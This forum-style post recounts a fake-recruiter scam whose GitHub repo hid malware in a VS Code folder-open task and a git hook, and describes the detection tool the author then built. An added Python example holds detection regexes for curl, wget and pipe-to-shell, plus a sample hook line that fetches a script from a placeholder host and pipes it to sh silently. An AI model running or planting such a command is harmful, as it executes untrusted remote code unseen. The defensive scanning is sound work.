A recruiter contacted me on LinkedIn on Wednesday. CEO of a crypto startup, $125/hr advisory role, review our product via GitHub repo as the first interview step. The social engineering was top-notch, polished profile with 500+ connections, days of back and forth DMs, the cracks only appeared in hindsight.
Friday, I got access to the repo, which felt like a win. With a healthy amount of skepticism, I reviewed the repo with Claude. The codebase looked professional and complete, the README was well structured, and the .json files where malware would normally be hidden came back clean. The payload was buried well enough that Claude and I missed it. Luckily, I decided to enjoy my Friday night and not clone the repo.
This is the main reason I want to share my story here: many of us are starting new businesses, and when someone offers you a paid role that seems like the perfect fit, your judgment becomes clouded. I know mine did.
Having had more time to think, the inconsistencies started to surface. Lying in bed around midnight on Saturday, the eureka moment happened. This was definitely an elaborate scam. I stayed up all night digging through the repo and gathering evidence to file reports. Here’s what I found:
The repo contained a fully operational malware delivery chain:
- .vscode/tasks.json configured with runOn: folderOpen — silent code execution the moment you open the folder in VS Code, zero prompt.
- .githooks/post-checkout buried under 40 lines of decoy comments, downloading and executing a remote payload from a Vercel server across Mac, Linux, and Windows simultaneously, all output suppressed.
- Private key social engineering via the .env.local README instruction, a backup vector in case the malware delivery fails or gets caught.
This is a complex attack chain designed to pass pre-clone inspection. Once you clone it, you’re cooked.
I stayed up all night gathering evidence and filing reports: Vercel - both domains, GitHub - account + repo, LinkedIn profile, Basescan wallet flagged, Neynar/Farcaster. Then the big guns: RCMP/CAFC and FBI IC3. But then I started thinking, what tools should I have used to protect myself in this situation?
From my research: neither Snyk, Socket.dev, nor npm audit checks .vscode/tasks.json for auto-execution or .githooks for hidden payloads. These are documented attack vectors with zero accessible defensive tooling. So I designed one.
Before any code was written, I produced a full PLAN.md: module specs, data models, dependency decisions, phased build order, and explicit quality gates. PLAN.md went through multiple design and vetting stages to become NORTHSTAR.md for my coding agent. Every phase ends with a pytest run. If tests pass, commit and move to the next phase. If something breaks, roll back to the last commit and fix it before proceeding. No exceptions. I'm not running a swarm of agent windows and accepting whatever they output. The agents are the implementation crew, and they work from a locked spec with checkpoints I control.
The workflow:
- Claude - brainstorming partner, project management, agent prompts
- Kimi - research tasks, security audits between phases, pytest design vetting
- DeepSeek - code implementation, using NORTHSTAR.md as the source of truth
- Pytest after every phase - nothing proceeds unless all tests pass
- Git commits as checkpoints - passing stage gets a commit, every breaking change gets rolled back
The tool is called repo-guard. It scans GitHub repos via API, with no cloning and no execution, and flags trust score anomalies, VS Code auto-execution, git hook payloads, and IOCs with optional VirusTotal enrichment. 184 pytests to ensure no breakage.
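The two auto-execution checks described above (a tasks.json task with runOn: folderOpen, and a hook that downloads a payload beneath decoy comments) can be made on file contents alone, without cloning or opening the folder. The following is an added example, not repo-guard's code or the author's; the function names, regex patterns and sample inputs are constructed for illustration.

```python
import json
import re

# Illustrative patterns (assumptions, not an exhaustive rule set).
FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)
EXEC = re.compile(r"\|\s*(sh|bash|zsh|node|python3?|iex)\b|\bInvoke-Expression\b", re.I)
QUIET = re.compile(r">\s*/dev/null|2>&1|>\s*\$null", re.I)

def scan_tasks_json(text):
    """Flag VS Code tasks configured to run as soon as the folder is opened."""
    try:
        doc = json.loads(text)
    except json.JSONDecodeError:
        # tasks.json may legally contain comments; unparsable is not "clean".
        return ["tasks.json: not plain JSON, review manually"]
    findings = []
    tasks = doc.get("tasks", []) if isinstance(doc, dict) else []
    for task in (t for t in tasks if isinstance(t, dict)):
        ro = task.get("runOptions")
        if not isinstance(ro, dict) or ro.get("runOn") != "folderOpen":
            continue
        # Base command plus per-OS overrides, which can differ from it.
        variants = [task] + [task[k] for k in ("osx", "linux", "windows")
                             if isinstance(task.get(k), dict)]
        cmds = [str(v["command"]) for v in variants if v.get("command")]
        findings.append(f"tasks.json: task {task.get('label', '?')!r} "
                        f"runs on folderOpen: {' ; '.join(cmds)}")
    return findings

def scan_hook(name, text):
    """Flag non-comment hook lines that download remote content."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("#"):
            continue  # decoy comments are skipped, line numbers are kept
        if FETCH.search(code):
            tags = ["fetch"] + [t for t, rx in (("exec", EXEC), ("quiet", QUIET))
                                if rx.search(code)]
            findings.append(f"{name}:{no}: {'+'.join(tags)}: {code}")
    return findings

# Constructed sample inputs (not taken from the repo in the post).
SAMPLE_TASKS = json.dumps({"version": "2.0.0", "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "prep", "type": "shell", "command": "node ./setup.js",
     "runOptions": {"runOn": "folderOpen"}}]})
SAMPLE_HOOK = ("#!/bin/sh\n" + "# decoy comment\n" * 40 +
               "curl -s https://example.invalid/p | sh >/dev/null 2>&1\n")
```

Calling `scan_hook(".githooks/post-checkout", SAMPLE_HOOK)` reports the download on line 42, below the comment block, and a tasks.json that cannot be parsed is reported for manual review rather than treated as clean.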
I was targeted by a sophisticated threat actor pretending to offer strategic advising work. This attack is consistent with documented North Korean Lazarus Group developer recruitment campaigns. It was good enough to fool me and an AI assistant doing active due diligence for two days. If you're early in this journey and someone sends you a repo to review: do not clone it. Slow down, scan it first and above all else, TRUST YOUR GUT!
I’ve been coding with AI for about 7 weeks. This is one of my first public repos, and any feedback is greatly appreciated. Happy to answer any questions about the attack chain, share screenshots of the malicious code, whatever you'd like. If you made it this far, thanks for reading and good luck on your development journey.